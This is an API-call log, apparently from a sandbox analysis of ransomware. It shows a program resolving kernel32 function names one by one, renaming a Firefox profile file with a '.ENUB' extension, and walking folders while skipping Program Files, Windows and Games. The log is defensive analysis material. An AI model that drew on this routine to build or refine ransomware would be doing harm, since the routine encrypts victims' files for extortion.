[0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.169] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.169] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.169] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.169] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.169] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.169] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.169] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.169] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.169] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.169] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.170] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.170] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.170] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.170] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.170] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.170] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.170] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.170] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.170] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.170] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.170] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.170] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.170] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.170] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.170] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.170] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.170] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.170] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.171] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.171] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.171] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.171] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.171] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.171] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.171] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.171] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.171] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.171] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.171] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.171] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.171] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.171] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.171] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.171] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.171] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.171] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.172] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.172] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.172] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.172] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.172] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.172] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.172] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.172] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.172] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.172] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.172] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.172] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.172] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.172] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.172] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.172] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.172] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.172] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.172] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.172] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.173] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.173] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.173] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.173] lstrlenA (lpString="DELETEATOM") returned 10 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.173] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.173] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.173] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.173] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.173] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.173] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.173] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.173] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.173] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.173] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.173] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.173] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.173] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.173] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.173] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.174] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.174] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.174] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.174] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.174] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.174] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.174] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.174] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.174] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.174] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.174] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.174] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.174] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.174] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.174] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.174] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.174] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.174] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.174] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.174] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.175] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.175] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.175] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.175] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.175] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.175] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.175] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.175] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.175] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.175] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json") returned 98 [0082.175] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.ENUB") returned 103 [0082.175] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.ENUB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json.enub"), dwFlags=0x0) returned 1 [0082.184] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.184] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.184] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.185] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80d71510, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80d71510, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="webapps", cAlternateFileName="")) returned 1 [0082.185] lstrcmpW (lpString1="webapps", lpString2=".") returned 1 [0082.185] lstrcmpW (lpString1="webapps", lpString2="..") returned 1 [0082.185] lstrcatW (in: lpString1="webapps", lpString2="\\" | out: lpString1="webapps\\") returned="webapps\\" [0082.185] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="webapps\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" [0082.185] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\Program Files") returned 0x0 [0082.185] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch=":\\Windows") returned 0x0 [0082.185] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\Games\\") returned 0x0 [0082.185] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 